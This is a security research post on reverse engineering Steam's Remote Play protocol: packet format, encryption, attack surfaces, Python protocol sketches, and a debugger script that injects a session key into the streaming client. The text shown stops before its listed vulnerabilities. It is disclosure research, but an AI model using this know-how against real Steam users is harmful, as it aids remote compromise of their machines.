Achieving Remote Code Execution in Steam: a journey into the Remote Play protocol
Valve, the company behind the widely used video game platform Steam, released a feature called Remote Play Together in 2019. It allows players to share local multiplayer games with friends over the network through streaming.
The protocol associated with the Remote Play technology is elaborate enough to give rise to stimulating attack scenarios, and in the past its surface has scarcely been ventured into.
In this post, we will cover the reverse engineering of the protocol and its implementations within Steam (client and server), before going through a few vulnerabilities that were found with the help of a dedicated fuzzer.
Note: this work was presented at SSTIC 2023 — you can find the talk and the slides here. This post aims at giving a little bit more insight and figuring in some new elements of research that could not be showcased back then.
In particular, we will discuss a critical Remote Code Execution vulnerability targeting the streaming client component.
Table of Contents
- Introduction
- Study of the Remote Play implementations in Steam
- Main attack surfaces
- Implementing a custom client and server
- Implementing a dedicated fuzzer
- Vulnerabilities
  - Path traversal file write in CSetTouchIconDataMsg
  - Format string bugs in CRemotePlayTogetherGroupUpdateMsg
  - Request forgery in CRemotePlayTogetherGroupUpdateMsg
  - OOB access in CRemotePlayTogetherGroupUpdateMsg
  - Heap overflow in YV12 video frames
  - Heap overflow in CRemoteHIDMsg gamepad logic
- Timeline
- Conclusion
Introduction
Context and target
More than a billion people around the world play online videogames on various platforms: Windows, Linux, macOS, Android, iOS, gaming consoles, VR headsets and more.
Online multiplayer games are also massive binaries with a large attack surface (network, gaming logic, graphics, sound, maps…). They are thus great targets for remote hackers, who can seek to exploit vulnerabilities in game clients or servers to fulfill various purposes: cheating, harvesting credentials, spreading malware, cryptomining, or even targeted surveillance.
Valve is a well-known game developer and publisher. They have created many popular games, like Half-Life, Counter-Strike and Portal, as well as a game engine called the Source Engine. They seemed like a nice target, as they run a bug bounty program on HackerOne with many public reports. These can provide great inspiration for attack surfaces and exploitation techniques related to Valve products.
Several people have already successfully discovered RCEs in games such as CS:GO, or inside the Source Engine. However, it seemed to me that fewer people have tried reverse engineering the Steam client itself and looking for vulnerabilities in it, which is why I decided to take a look at it.
Steam is a software application developed by Valve and, without a doubt, the most widely used video game platform. It centralizes and distributes tens of thousands of games, while offering a myriad of features related to social networking, game integration, streaming, inventories, markets, workshops, etc. In 2020, Steam reported 62M daily active users.
Here is an attempt to briefly summarize potential levels or layers of attack surfaces within Valve products:
The Steamworks API is a software development kit aimed at game developers to integrate Steam features into their games: matchmaking, leaderboards, Steam Workshop, friends, invites and many more. It is a valuable attack surface as well, since it can be a common vector across many games. For instance, in 2021, slidybat reported a stack buffer overflow in the DecompressVoice method that impacted games with voice communications, like CS:GO.
However, delving into the public reports, I never found mention of a particularly interesting component in the Steam client: Steam Remote Play.
Steam Remote Play
Steam Remote Play actually exists under various forms. It began with Steam Link, released in 2015. Initially a set-top box, its hardware version was discontinued in 2018 to make way for a software-based version, also sometimes called Steam In-Home Streaming.
Steam Link allows one to stream a game from their computer, usually a gaming rig, to another (typically less powerful) device, like a smartphone, a tablet or a TV. Consequently, there are Steam Link clients for Windows, Linux, Android and iOS.
In 2019, Valve then introduced Remote Play Together, allowing players to share local multi-player games with their friends over the network through streaming. The player who streams the game, called the host, only has to send an invite link to another player, the guest (who does not need to own the game). The guest may send inputs (mouse, keyboard, controller…) to play together with the host if they are granted permission to.
Unsurprisingly, the protocol behind Steam Link and Remote Play Together is the same, so both products can be analyzed in order to reverse engineer the protocol. In terms of attack scenarios, Remote Play Together is however a more promising target.
Indeed, host and guest are connected through a peer-to-peer link (or through a transparent relay), meaning no third party will verify, filter or alter messages from host to guest and conversely. Moreover, both host-to-guest and guest-to-host attack scenarios are worth considering and interesting to investigate. Note that throughout this post, the terms client and guest will be used interchangeably, as well as the terms server and host.
Based on this information, two main attack scenarios against Remote Play Together can be thought of:
- escaping the “game sandbox” to gain graphical remote access to the host’s desktop (client-side attackers only);
- exploiting vulnerabilities such as memory corruption to achieve RCE or info leak (for both client and server-side attackers).
We didn’t delve into the first one at all, because it seemed that reversing the streaming, sandboxing and access control logic would prove harder than homing in on finding bugs in protocol parsing and message processing (maybe it’s not, who knows!).
In addition, the latter lends itself better to fuzzing techniques and can target both the client and the server implementations, so this is what this post will focus on.
Both host-to-guest and guest-to-host attack scenarios are worth investigating, but it is important to notice that vulnerabilities in Remote Play Together have a stronger impact for guest players, as a client victim:
- does not need to own any particular game on Steam;
- does not need to be friends with the attacker on Steam (anyone can open an invite link);
- automatically connects to the Remote Play server upon the link being opened (no further user interaction or confirmation).
An invite link can even be opened without any user interaction under certain circumstances: for instance, if a steam:// wrapper is hidden inside an iframe on a web page hosted on a trusted domain (see this report). This can turn a remote code execution exploit into a zero-click attack!
NB: we chose to focus on the Windows binaries, because those are the most popular and vulnerabilities in them would impact the most people.
Study of the Remote Play implementations in Steam
Software architecture
Remote Play involves two main binaries: streaming_client.exe, which is spawned by Steam upon joining a session and contains all of the client logic, and SteamUI.dll, where most of the server’s logic is located. Like most of Steam, these are written in C++. Analyzing them will provide answers to questions such as how client and server communicate, what the packet format is, where in the binaries packets arrive, and how audio and video data is exchanged.
These rather large binaries (15MB) are devoid of debug symbols, making the analysis much more laborious. Fortunately, there is another way.
The Steam Link client for Android (native library) curiously happens to contain a lot of debug symbols, most notably function names. Although this may be some kind of compilation or distribution error on Valve’s part, it is definitely a godsend for reverse engineers.
Therefore, even though we target Windows environments, most of the analysis for the protocol can be performed on the Android client. The following diagram shows a high-level architecture of the client implementation.
Some important dependencies include the Protobuf library, leveraged to serialize messages in the Remote Play protocol (and also used extensively within Valve games and Steam more generally), and SDL, which is mainly used for GUI, audio/video rendering, and interfacing with input devices (keyboard, controllers…).
At the foundation of the client lies a rather large component, the Steam Networking Sockets library, in charge of P2P transport. It seems to be at least partially based on Valve’s Game Networking Sockets (GNS), an open-source UDP connection-oriented transport layer with support of many features such as encryption and P2P.
A brief analysis suggested that Valve may use a heavily modified version of GNS. Indeed, the P2P part of GNS is based on WebRTC and the ICE protocol, but Remote Play doesn’t seem to implement the full WebRTC stack: it mostly consists of TURN/STUN and custom encryption layers with clear deviations from GNS. It was decided not to investigate this component further because in the context of Remote Play, attack scenarios involving this library are much more complex.
As for the server implementation, its architecture is quite similar to the client’s, minus the human interface part. It is also worth noting that the server implementation is part of a bigger DLL that contains a lot of other Steam-related functionality unrelated to Remote Play.
Reverse engineering the protocol
To get started on reverse engineering the protocol, there exists a tremendously useful Protobufs repository on GitHub, maintained by the SteamDB project. It tracks many protobuf definitions from Valve products.
More particularly, the steammessages_remoteplay.proto file is, simply put, a goldmine to get started on reversing the protocol, as it includes pretty much all the message types and their fields. Of course, the effort does not stop there; there is still a lot to unpack by reversing the binaries, and the first step is to understand how packets are received and processed.
Network reception logic and processing
The following diagram shows a high-level view of the data flow for packets that arrive from the server.
Having a clearer overview of this part of the architecture helps a lot, on one hand, to understand the protocol, and on the other hand, to bring out potential attack surfaces.
From this figure, we can pinpoint three main components.
First, there’s the network reception logic on the left, which depends on the chosen transport mode. It is characterized by an interface called IStreamTransport, which implements primitives for sending and receiving data. This way, we don’t need to worry whether direct UDP, Steam Datagram Relays or WebRTC was used for the P2P link: all packets end up in the CStreamSocket::HandlePacket method at some point.
Next, the purple block implements header parsing logic. The classes in this component reveal a lot of fields, mechanisms and concepts within the protocol: for example, flags, checksums (CRC32C), the existence of different packet types (Connect, Disconnect, Data, Ack…) and a system of channels.
Finally, after passing through different queues and systems related to reassembling and fragmentation, the packets land in CStreamClients’s OnStreamPacket method, where they are then handled differently depending on the channel they are associated with.
Channel system
Channels are an abstraction layer for the transport of parallel data, and are represented by identifiers between 0 and 31:
enum EStreamChannel {
k_EStreamChannelInvalid = -1;
k_EStreamChannelDiscovery = 0;
k_EStreamChannelControl = 1;
k_EStreamChannelStats = 2;
k_EStreamChannelDataChannelStart = 3;
}
A few channels are statically allocated, the most important ones being the control channel (0x1) and the stats channel (0x2). The stats channel is used to communicate statistics, events, debug logs and screenshots. As for audio and video streams, they are dynamically allocated a data channel (0x3-0x1f) upon request from the server (or the client for microphone audio data).
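To make the channel numbering concrete, here is a minimal Python sketch that mirrors the enum above and labels an identifier as static, data or invalid. The class name StreamChannel and the helper classify_channel are hypothetical names chosen for illustration; only the numeric values and the 0 to 31 range come from the analysis.

```python
from enum import IntEnum


class StreamChannel(IntEnum):
    """Python mirror of the statically allocated EStreamChannel values."""
    INVALID = -1
    DISCOVERY = 0
    CONTROL = 1
    STATS = 2
    DATA_CHANNEL_START = 3


MAX_CHANNEL = 0x1F  # channel identifiers range from 0 to 31


def classify_channel(channel_id: int) -> str:
    """Return a coarse label for a channel identifier."""
    if not 0 <= channel_id <= MAX_CHANNEL:
        return "invalid"
    if channel_id >= StreamChannel.DATA_CHANNEL_START:
        # Dynamically allocated audio/video channel (0x3-0x1f).
        return "data"
    # One of the statically allocated channels (discovery, control, stats).
    return StreamChannel(channel_id).name.lower()
```

A custom client or server could use such a helper to route incoming packets before any body parsing takes place.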
The control channel (0x1) is the channel that carries the most message types (around a hundred). The enum EStreamControlMessage defines the control message types, which serve multifarious purposes:
- authenticating and negotiating upon connection;
- setting audio, video or network parameters;
- sending inputs (mouse, keyboard, controller, touchscreen);
- sharing information about the lobby (game, players);
- interacting with remote HID devices;
- editing the client’s cursor, icon, window title…
Message format
The analysis of the components involved in header parsing makes it possible to reconstruct the format of the packets that are exchanged. The following diagram is a typical example of what a control packet may look like.
The different fields will not be described in detail as the goal of this post is not to write a specification for the protocol. I will say, though, that certain fields such as Connection ID, Fragment and Packet ID are very sensitive and need to be constructed carefully in order not to raise errors in the client or server and break the session.
Processing of control messages and cryptography
Zooming in on the body parsing block from the higher-level view diagram yields the following flowchart, which describes how packets are dispatched in the client based on their channel and how control messages are handled:
Messages from the control channel are all encrypted, with the exception of Authentication and Handshake messages (1, 2, 6, 7). These are sent in plaintext because they are exchanged before the client is successfully authenticated.
Even before the Remote Play session itself starts, client and server agree on a shared secret key, called the session key. How this key is agreed upon depends on the transport mode and is not relevant to our analysis: we only assume this key exists and is the one used to encrypt all messages.
Encrypted control message bodies consist of:
- 1 byte to indicate the message type (EStreamControlMessage enum);
- the message encrypted using the following formula, where Message is prefixed by an 8-byte sequence number (incremented every new control message):
$$\text{AES-CBC}\big(\text{Message},\ \text{SessionKey},\ \text{IV} = \text{HMAC-MD5}_{\text{SessionKey}}(\text{Message})\big)$$
Upon reception, the session key and the IV are used to decrypt the message. Then, the IV, which also happens to be an HMAC of the message, is used to verify its integrity. Finally, the sequence number is checked. If anything goes wrong, the packet is discarded.
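The non-AES parts of this scheme can be sketched with the Python standard library alone. The snippet below covers building the plaintext, deriving the IV, and the checks run after decryption; the AES-CBC step itself is left out because it needs a third-party package. The little-endian sequence number, the strict equality check on it, and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import struct

# Control message types exchanged in plaintext (authentication and handshake).
PLAINTEXT_TYPES = {1, 2, 6, 7}


def needs_encryption(message_type: int) -> bool:
    """Every control message except the four listed above is encrypted."""
    return message_type not in PLAINTEXT_TYPES


def build_plaintext(sequence: int, payload: bytes) -> bytes:
    """Prefix the serialized message with its 8-byte sequence number.

    Little-endian byte order is an assumption, not a confirmed detail.
    """
    return struct.pack("<Q", sequence) + payload


def derive_iv(session_key: bytes, plaintext: bytes) -> bytes:
    """IV = HMAC-MD5 keyed with the session key, computed over the plaintext.

    MD5 yields 16 bytes, which matches the AES block size.
    """
    return hmac.new(session_key, plaintext, hashlib.md5).digest()


def verify_plaintext(session_key: bytes, iv: bytes, plaintext: bytes,
                     expected_sequence: int) -> bytes:
    """Checks run after decryption: integrity first, then sequence number."""
    if len(plaintext) < 8:
        raise ValueError("plaintext too short to hold a sequence number")
    if not hmac.compare_digest(iv, derive_iv(session_key, plaintext)):
        raise ValueError("HMAC mismatch: packet discarded")
    (sequence,) = struct.unpack_from("<Q", plaintext)
    if sequence != expected_sequence:  # exact-match policy is an assumption
        raise ValueError("unexpected sequence number: packet discarded")
    return plaintext[8:]
```

Because the IV doubles as a MAC over the plaintext, a receiver can only verify integrity after decrypting, which is why the checks are ordered this way.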
There is a special kind of control message called CRemoteHIDMsg. It is related to remote HID device interaction and will be detailed further when mentioning attack surfaces.
The treatment of all other control messages is deferred, and later on, they are dispatched one at a time to their corresponding sub-handler.
Connection sequence diagram
Last but not least, here is a sequence diagram that can be reconstructed for the protocol:
Both the server and the client rely on a state machine. After connecting and performing a handshake, the client must send an Authentication Request. It contains an HMAC of a constant magic string ("Steam In-Home Streaming") using the session key. This way, the server ensures that the client knows the session key and will be able to decrypt future messages.
Then, they exchange various settings, such as the audio/video codecs to use or whether to enable certain features, through a negotiation phase.
Once the configuration is done, the client and the server enter the Streaming state, where they can freely exchange control packets and audio/video data.
Although this preliminary setup sequence can be subject to bugs, the Streaming state is more interesting for vulnerability research as it handles more complex data and exposes a larger attack surface.
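For a reimplementation, the sequence described above can be modelled as a small linear state machine. The sketch below is only an illustration: apart from Authenticating and Streaming, the state names are hypothetical, and the real implementations may allow more transitions (disconnects, renegotiation) than this strictly linear model.

```python
from enum import Enum, auto


class SessionState(Enum):
    CONNECTING = auto()
    HANDSHAKING = auto()     # hypothetical name
    AUTHENTICATING = auto()
    NEGOTIATING = auto()     # hypothetical name
    STREAMING = auto()


# Each state has exactly one legal successor in this simplified model.
_NEXT_STATE = {
    SessionState.CONNECTING: SessionState.HANDSHAKING,
    SessionState.HANDSHAKING: SessionState.AUTHENTICATING,
    SessionState.AUTHENTICATING: SessionState.NEGOTIATING,
    SessionState.NEGOTIATING: SessionState.STREAMING,
}


class Session:
    """Tracks where a peer stands in the connection sequence."""

    def __init__(self) -> None:
        self.state = SessionState.CONNECTING

    def advance(self, new_state: SessionState) -> None:
        """Move to the next state, rejecting out-of-order transitions."""
        if _NEXT_STATE.get(self.state) is not new_state:
            raise RuntimeError(
                f"illegal transition {self.state.name} -> {new_state.name}")
        self.state = new_state

    def can_exchange_stream_data(self) -> bool:
        """Control packets and audio/video flow freely only once streaming."""
        return self.state is SessionState.STREAMING
```

Keeping the transitions explicit makes it easy for a test harness to notice when a peer accepts a message in a state where it should not.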
Main attack surfaces
We can accordingly identify three main attack surfaces inside the parsing of message bodies. Each one will be covered in more detail.
Attack surface | Client -> Server | Server -> Client |
---|---|---|
Control messages | ~40 message types | ~50 message types |
Remote HID | 5 message types | 12 message types |
Audio/video data | Microphone | Game audio and video |
Note: there are actually two more attack surfaces, namely the connection phase and the parsing of headers (including the channel management and packet fragmentation systems). These surfaces are not very broad and were subject to manual vulnerability research. Nothing of interest was found.
Control messages
Control messages are the broadest and perhaps most valuable attack surface in Remote Play: there are almost a hundred different types of messages split between the client and the server. As stated earlier, they are all associated with a Protobuf structure.
While some of these are rather short and straightforward, others are more intricate and good targets for vulnerability research. For instance, the following message type features strings, bytes, index fields and an array of nested sub-messages — all of which could hide bugs (out-of-bounds accesses, integer overflows…).
message CRemotePlayTogetherGroupUpdateMsg {
message Player {
optional uint32 accountid = 1;
optional uint32 guestid = 2;
optional bool keyboard_enabled = 3;
optional bool mouse_enabled = 4;
optional bool controller_enabled = 5;
repeated uint32 controller_slots = 6;
optional bytes avatar_hash = 7;
}
repeated .CRemotePlayTogetherGroupUpdateMsg.Player players = 1;
optional int32 player_index = 2;
optional string miniprofile_location = 3;
optional string game_name = 4;
optional string avatar_location = 5;
}
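To illustrate why an index field next to a repeated field deserves attention, here is a hedged Python sketch of the bounds check a receiver would want before using player_index. The dataclasses are a simplified, hypothetical mirror of the Protobuf message (only a few fields are kept), and nothing here describes what Steam actually does.

```python
from dataclasses import dataclass, field
from typing import List


@dataclass
class Player:
    accountid: int = 0
    guestid: int = 0
    controller_slots: List[int] = field(default_factory=list)
    avatar_hash: bytes = b""


@dataclass
class GroupUpdate:
    players: List[Player] = field(default_factory=list)
    player_index: int = 0  # int32 on the wire, so it may be negative
    game_name: str = ""


def current_player(msg: GroupUpdate) -> Player:
    """Return the player designated by player_index after validating it.

    Without the lower-bound check, a negative index would silently wrap
    around in Python; in C++ it would read outside the array.
    """
    if not 0 <= msg.player_index < len(msg.players):
        raise ValueError(f"player_index {msg.player_index} is out of range")
    return msg.players[msg.player_index]
```

When fuzzing, values such as -1, len(players) and 2**31 - 1 for player_index are natural candidates to try first.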
Remote HID
Remote HID is a feature that allows the server to interact with the client’s human interface devices, such as USB controllers. The protobuf definition for the k_EStreamControlRemoteHID message type is a rather enigmatic structure:
message CRemoteHIDMsg {
optional bytes data = 1;
optional bool active_input = 2;
}
Reversing shows that the data field is actually nested serialized Protobuf data. More specifically, it is a serialized CHIDMessageToRemote message (for client targets) or a serialized CHIDMessageFromRemote message (for server targets). The definitions of these messages can be found in another file, steammessages_hiddevices.proto.
The CHIDMessageToRemote message looks like this:
message CHIDMessageToRemote {
// <snip>
optional uint32 request_id = 1;
oneof command {
.CHIDMessageToRemote.DeviceOpen device_open=2;
.CHIDMessageToRemote.DeviceClose device_close=3;
.CHIDMessageToRemote.DeviceWrite device_write=4;
.CHIDMessageToRemote.DeviceRead device_read=5;
.CHIDMessageToRemote.DeviceSendFeatureReport device_send_feature_report=6;
.CHIDMessageToRemote.DeviceGetFeatureReport device_get_feature_report=7;
.CHIDMessageToRemote.DeviceGetVendorString device_get_vendor_string=8;
.CHIDMessageToRemote.DeviceGetProductString device_get_product_string=9;
.CHIDMessageToRemote.DeviceGetSerialNumberString device_get_serial_number_string=10;
.CHIDMessageToRemote.DeviceStartInputReports device_start_input_reports=11;
.CHIDMessageToRemote.DeviceRequestFullReport device_request_full_report=12;
.CHIDMessageToRemote.DeviceDisconnect device_disconnect=13;
}
}
We understand that remote HID is a whole sub-protocol. The request_id field tags messages in order to keep track of which request a given response corresponds to. Then, one of the 12 sub-message types is nested. These make it possible to open a client device, read from it, write to it, and obtain various metadata.
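The double serialization can be shown with a hand-rolled encoder for the Protobuf wire format, using only the field numbers from the definitions above. This is a minimal sketch: the helper names are hypothetical, the command body is left empty because the sub-message definitions are not reproduced in this post, and a real implementation would rather use classes generated by protoc.

```python
from typing import Optional


def encode_varint(value: int) -> bytes:
    """Encode a non-negative integer as a Protobuf base-128 varint."""
    if value < 0:
        raise ValueError("this sketch only handles non-negative integers")
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def varint_field(number: int, value: int) -> bytes:
    """Field with wire type 0 (varint): uint32, bool, enum..."""
    return encode_varint((number << 3) | 0) + encode_varint(value)


def bytes_field(number: int, payload: bytes) -> bytes:
    """Field with wire type 2 (length-delimited): bytes, string, sub-message."""
    return encode_varint((number << 3) | 2) + encode_varint(len(payload)) + payload


def build_remote_hid_msg(request_id: int, command_field: int,
                         command_body: bytes = b"",
                         active_input: Optional[bool] = None) -> bytes:
    """Serialize a CHIDMessageToRemote and wrap it in CRemoteHIDMsg.data."""
    inner = varint_field(1, request_id) + bytes_field(command_field, command_body)
    outer = bytes_field(1, inner)  # CRemoteHIDMsg.data = 1
    if active_input is not None:
        outer += varint_field(2, int(active_input))  # active_input = 2
    return outer


# Example: request 1 carrying an (empty) device_close command, field 3.
packet = build_remote_hid_msg(request_id=1, command_field=3)
```

Since the outer layer treats the inner message as opaque bytes, a fuzzer has to mutate the inner message before wrapping it, otherwise it only exercises the outer parser.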
The actions that are performed and the data that is sent back obviously depend on the type of plugged-in device, hence why the list of commands is actually an interface for which there exist multiple implementations:
Implementation | Can be triggered via… |
---|---|
CVirtualController | Virtual touch device in the client settings |
CHIDDeviceSDLGamepad | USB controller, handled by SDL |
CHIDDeviceSDLJoystick | USB joystick, handled by SDL |
CHIDDeviceLocal | Manually opening device via SDL API or raw IOCTL (fallback) |
In terms of attack surfaces, only the first three implementations are of interest, as the local device one is entirely device-specific (no client logic).
The caveat is that since each implementation is specific to a type of device, it is harder to look for bugs without owning or emulating such a device, and the bugs themselves can depend heavily on the client’s device, which is not under the attacker’s control.
As for the messages that the client can send to the server:
oneof command {
.CHIDMessageFromRemote.UpdateDeviceList update_device_list = 1;
.CHIDMessageFromRemote.RequestResponse response = 2;
.CHIDMessageFromRemote.DeviceInputReports reports = 3;
.CHIDMessageFromRemote.CloseDevice close_device = 4;
.CHIDMessageFromRemote.CloseAllDevices close_all_devices = 5;
}
The client can announce its list of available devices (gamepads, joysticks…) through the UpdateDeviceList message. It can also answer a read request or a feature report request with specific data.
Remote HID is therefore a tempting attack surface: it adds 17 new message types in total, and as their purpose is to interface with devices, they operate at a slightly lower level.
Audio/video data
In data channels, the sub-handling logic primarily depends on the codec that was selected by the channel opener. The following tree diagram shows the different codecs and formats that are implemented in Remote Play.
The most interesting codecs are the raw ones, because they implement custom logic, unlike other codecs that usually leverage third-party libraries (e.g. libopus).
It is also worth noting most codecs actually do not implement encryption (which is rather odd since audio or video communications can carry sensitive data; although it is not that much of a security issue in a remote SDR/WebRTC context backed by underlying encryption layers).
Data packets embed a whole new layer of data, encapsulated within an additional header. Although not all of the fields were fully figured out, the following information is enough for a server to send audio or video data that the client understands and renders:
Field | Size (bytes) |
---|---|
Data message type | 1 |
Sequence number 1 | 2 |
Timestamp | 4 |
Unknown | 6 |
Sequence number 2 | 2 |
Flags | 1 |
Unknown | 4 |
Timestamps have to be non-zero and increasing. Observations showed that the unknown fields were always zero and that the sequence number fields were usually equal, except for audio data where the second one is zero.
It also appears that, for some reason, the last three fields were at times absent for certain codecs, like the raw video one.
This new knowledge makes it possible to trigger new paths in the binary related to decoding audio and video data for each codec/format. These are an interesting surface because such functions may be more prone to memory corruption bugs.
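The header layout from the table can be packed with Python's struct module. This is a sketch under stated assumptions: little-endian byte order is a guess, the function name and parameters are hypothetical, and the short variant simply drops the last three fields as observed for some codecs.

```python
import struct

# Field sizes follow the table: 1 + 2 + 4 + 6 bytes, then 2 + 1 + 4 bytes.
# "<" selects little-endian without padding; the byte order is an assumption.
_FIXED = struct.Struct("<BHI6s")  # type, sequence 1, timestamp, unknown
_TAIL = struct.Struct("<HB4s")    # sequence 2, flags, unknown


def pack_data_header(msg_type: int, sequence: int, timestamp: int,
                     flags: int = 0, audio: bool = False,
                     short: bool = False) -> bytes:
    """Build the header that precedes audio/video data on a data channel."""
    timestamp &= 0xFFFFFFFF
    if timestamp == 0:
        raise ValueError("timestamps have to be non-zero")
    header = _FIXED.pack(msg_type & 0xFF, sequence & 0xFFFF, timestamp, bytes(6))
    if short:
        # Some codecs (e.g. raw video) were seen without the last three fields.
        return header
    # The second sequence number mirrors the first, except for audio data.
    second_sequence = 0 if audio else sequence & 0xFFFF
    return header + _TAIL.pack(second_sequence, flags & 0xFF, bytes(4))
```

A sender would also have to keep timestamps strictly increasing from one packet to the next, which this helper leaves to the caller.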
Implementing a custom client and server
This section explains how a client and a server for the Remote Play protocol were reimplemented in Python. Their first purpose was to make it easy to play around with the protocol and send custom messages manually. These implementations eventually grew into an ad hoc fuzzer, to which the next section is dedicated.
Choice of transport mode
We briefly mentioned earlier that Remote Play implements several modes of transport, given by the EStreamTransport enum. Some examples are UDP, relay UDP, WebRTC and SDR (Steam Datagram Relays).
A few tests showed that the network transport mode automatically preferred by the Remote Play client and server in Steam was SDR relaying. However, the simplest transport mode is direct UDP (k_EStreamTransportUDP), for clients and hosts that can communicate directly without the need for a peer-to-peer setup or relays.
Using direct UDP makes it possible to focus on the Remote Play protocol itself by circumventing any potential SDR or WebRTC abstraction, making it much easier to carry out tests and develop a custom client or server implementation that works locally.
Server reimplementation
Reimplementing a server for the Remote Play protocol made it possible to interface with the official streaming client in Steam. The latter can be started from the command line by specifying the transport mode (UDP) along with the server’s IP address and port.
"C:\Program Files (x86)\Steam\streaming_client.exe" --windowed --steamid 123 --gameid 456 --appid 789 --server 1.2.3.4:31337 --transport k_EStreamTransportUDP
However, there’s a catch. By running this binary directly, we have somewhat bypassed the key exchange scheme and once we get to the Authenticating state, the client cannot find any session key to load.
To address this issue, we can look for the first place in the client where the session key is supposed to be used: the CStreamClient::StartAuthentication method. Indeed, in this state, the client needs to calculate an HMAC using the session key to authenticate to the host:
int __fastcall CStreamClient::StartAuthentication(CStreamClient *this) {
CAuthenticationRequestMsg Msg; // [sp+8h] [bp-58h] BYREF
_BYTE hmac[32]; // [sp+34h] [bp-2Ch] BYREF
CStreamClient::SetSessionState(this, AUTHENTICATING);
CAuthenticationRequestMsg::CAuthenticationRequestMsg(Msg);
CCrypto::GenerateHMAC256(
"Steam In-Home Streaming",
strlen("Steam In-Home Streaming"),
this->Key,
this->KeySize,
hmac
);
CAuthenticationRequestMsg::set_token(Msg, hmac, 0x20);
CStreamClient::SendControlMessage(
this,
k_EStreamControlAuthenticationRequest,
Msg
);
CAuthenticationRequestMsg::~CAuthenticationRequestMsg(Msg);
}
At this point, just before CCrypto::GenerateHMAC256 is called, we can inject our own session key into the CStreamClient structure. To this end, a small x32dbg script was written to run the client and inject a 32-byte all-zero key. The same result may be achieved through many other techniques (patching, DLL injection…).
erun
// Reach CStreamClient::StartAuthentication, just before the call
// to CCrypto::GenerateHMAC256. Offset will depend on Steam version.
// ebx needs to point to the CStreamClient structure.
bp streaming_client:$10D9E5
erun
// New key (full null bytes)
alloc 32
$key = $result
fill $key, 0, 32
// Copy new key addr
mov dword:[ebx + 0x24], $key
// Copy key size (0x20)
set (ebx + 0x34), #20 00 00 00#
// Resume execution
erun
Once this issue has been addressed, the whole protocol can be reimplemented by leveraging the available Protobuf definitions. This requires going through the connection phase and implementing a few basic messages (such as Keep Alive) before being able to send custom control messages to the client.
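As a starting point for such a server, the following Python skeleton ties together the pieces of this section: the client command line, a local UDP listener, and the authentication token the client is expected to send once the all-zero key is injected. It is a sketch, not the actual tooling: the function names are hypothetical, and treating CCrypto::GenerateHMAC256 as HMAC-SHA256 is an assumption based on its name and its 32-byte output.

```python
import hashlib
import hmac
import socket
import subprocess

CLIENT_PATH = r"C:\Program Files (x86)\Steam\streaming_client.exe"
MAGIC = b"Steam In-Home Streaming"  # strlen() excludes the NUL terminator
INJECTED_KEY = bytes(32)            # all-zero key written by the debugger script


def build_client_argv(server_ip: str, port: int) -> list:
    """Command line shown earlier, with the same placeholder identifiers."""
    return [
        CLIENT_PATH, "--windowed",
        "--steamid", "123", "--gameid", "456", "--appid", "789",
        "--server", f"{server_ip}:{port}",
        "--transport", "k_EStreamTransportUDP",
    ]


def expected_auth_token(session_key: bytes = INJECTED_KEY) -> bytes:
    """Token the client should send, assuming HMAC-SHA256 (an assumption)."""
    return hmac.new(session_key, MAGIC, hashlib.sha256).digest()


def check_auth_token(token: bytes, session_key: bytes = INJECTED_KEY) -> bool:
    """Constant-time comparison against the expected token."""
    return hmac.compare_digest(token, expected_auth_token(session_key))


def wait_for_client(bind_ip: str = "127.0.0.1", port: int = 31337) -> bytes:
    """Bind a UDP socket, start the client and return its first datagram."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind_ip, port))
        subprocess.Popen(build_client_argv(bind_ip, port))
        data, _peer = sock.recvfrom(65535)
        return data
```

When the key is injected through the x32dbg script, the arguments returned by build_client_argv would be passed to the debugger rather than to subprocess.Popen.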
Client reimplementation
In order to target the server implementation, reimplementing a client required a little bit more work.
Setting up a Remote Play server directly through the invite mechanism that you can find in the Steam overlay when you are playing a game makes developing a client quite difficult, as the session will naturally be built over SDR or WebRTC.
There is, however, a way to circumvent this issue: forcing a direct UDP connection by hijacking a local Steam Link key.
Steam Link uses a separate protocol, called the Steam In-Home Streaming Discovery Protocol, for clients to discover devices that are available for streaming on a local network (or remotely with a PIN code system).
If Steam is launched and you have checked Enable Remote Play in the settings, you should be able to see your own machine appear.
Connecting to the machine then lands you inside your Steam library (through the Steam Big Picture UI).
What’s nice about the Discovery protocol, whose protobuf definitions are found in the steammessages_remoteclient_discovery.proto definition file, is that a client can specify a list of supported modes of transport inside the CMsgRemoteDeviceStreamingRequest message.
message CMsgRemoteDeviceStreamingRequest {
message ReservedGamepad {
optional uint32 controller_type = 1;
optional uint32 controller_subtype = 2;
}
required uint32 request_id = 1;
optional int32 maximum_resolution_x = 2;
optional int32 maximum_resolution_y = 3;
optional int32 audio_channel_count = 4 [default = 2];
optional string device_version = 5;
optional bool stream_desktop = 6;
optional bytes device_token = 7;
optional bytes pin = 8;
optional bool enable_video_streaming = 9 [default = true];
optional bool enable_audio_streaming = 10 [default = true];
optional bool enable_input_streaming = 11 [default = true];
optional bool network_test = 12;
optional uint64 client_id = 13;
repeated .EStreamTransport supported_transport = 14;
optional bool restricted = 15;
optional .EStreamDeviceFormFactor form_factor = 16;
optional int32 gamepad_count = 17;
repeated .CMsgRemoteDeviceStreamingRequest.ReservedGamepad gamepads = 18;
optional uint64 gameid = 19;
optional .EStreamInterface stream_interface = 20;
}
This way, one can ensure the connection will use direct UDP.
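To make this more concrete, here is a minimal sketch of how the relevant part of such a request could be serialized by hand, using nothing but the Protobuf wire format. The field numbers (1 for request_id, 14 for supported_transport) come from the definition above. The numeric value used for the direct UDP transport is an assumption, since the EStreamTransport enum is not reproduced in this post, and a real client would rather use the classes generated from the .proto file.

```python
def encode_varint(value):
    """Encode a non-negative integer as a Protobuf base-128 varint."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # continuation bit: more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def encode_varint_field(field_number, value):
    """Encode one varint-typed field (wire type 0): key, then value."""
    key = (field_number << 3) | 0
    return encode_varint(key) + encode_varint(value)


# ASSUMPTION: numeric value of the direct UDP member of EStreamTransport.
TRANSPORT_UDP = 1


def build_streaming_request(request_id, transports):
    """Serialize request_id (field 1) and supported_transport (field 14)."""
    payload = encode_varint_field(1, request_id)
    for transport in transports:
        # Non-packed repeated field: one key/value pair per element.
        payload += encode_varint_field(14, transport)
    return payload


request = build_streaming_request(request_id=1, transports=[TRANSPORT_UDP])
print(request.hex())
```

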